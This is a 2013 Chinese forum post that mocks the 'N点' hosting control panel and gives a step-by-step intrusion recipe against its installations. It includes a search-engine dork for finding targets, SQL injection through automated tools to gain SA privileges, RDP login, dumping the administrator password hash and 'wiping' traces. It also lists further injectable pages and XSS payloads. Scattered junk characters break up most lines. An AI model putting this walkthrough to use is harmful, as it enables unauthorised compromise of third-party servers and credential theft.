不得不说N点实在是一个破东西
/ Y) |2 R; j) R B2 \7 M4 i9 Q就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
; A0 ?' ]; V6 s6 M" w好吧 抱怨一下就行了 接下来关键的时候到了
# F% e( B% O, o% A3 ?4 e4 ~$ i首先百度搜索关键字:inurl: (mmdatabase.asp)
2 @+ c a( q+ k. r( w C- K A我随便列举一个: www.xxxx.com
# {0 M3 K9 Q9 o _ C9 E5 q5 m }修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1# F; S7 L; d8 s4 ]! S( x) M0 ~+ D. |
扔入NBSI 或者啊D等各种傻逼工具后
; `$ k4 _6 M- B% x/ c: g你们会看到是SA权限# J9 Z9 ~5 F5 I+ m
果断3389 上去 hash得到administrator密码0 \, P7 L$ t: X5 {; _
擦屁股走人~) N/ D. \9 P* X9 }8 Q* ~( T
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的. S, \' C3 Z# h& g' \0 v" h
* j! E' |3 f5 q; Y
再附上其他几个漏洞页面
) s- }8 \/ M7 Y" L/ C7 H3 A) WSQL:) ~* d* ^1 T6 R+ H1 q" s' l
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=16 C$ U* o! I5 i# [5 H
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11: k- l, R/ V6 D0 M. a
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
( h; }6 ^* ^) O0 \! ~1 x/ Whttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2) Z7 X6 r" I# o
XSS证明:
1 u* @+ w+ \+ k. ~; V# x' ?: |http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
; E% i) Y. J! nhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”# k f) g/ } K+ ^
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
# y* K* \8 Z1 u; s0 y( Q由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
8 J8 }+ ^' F/ {9 O- b% a( m还是星外吧 你们懂的) \8 b- Q3 @1 t! Q# J5 x5 u3 Q( z
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?5 f; G/ V! z& s4 h6 l1 ?: N
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
# P) }5 T, m" k——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对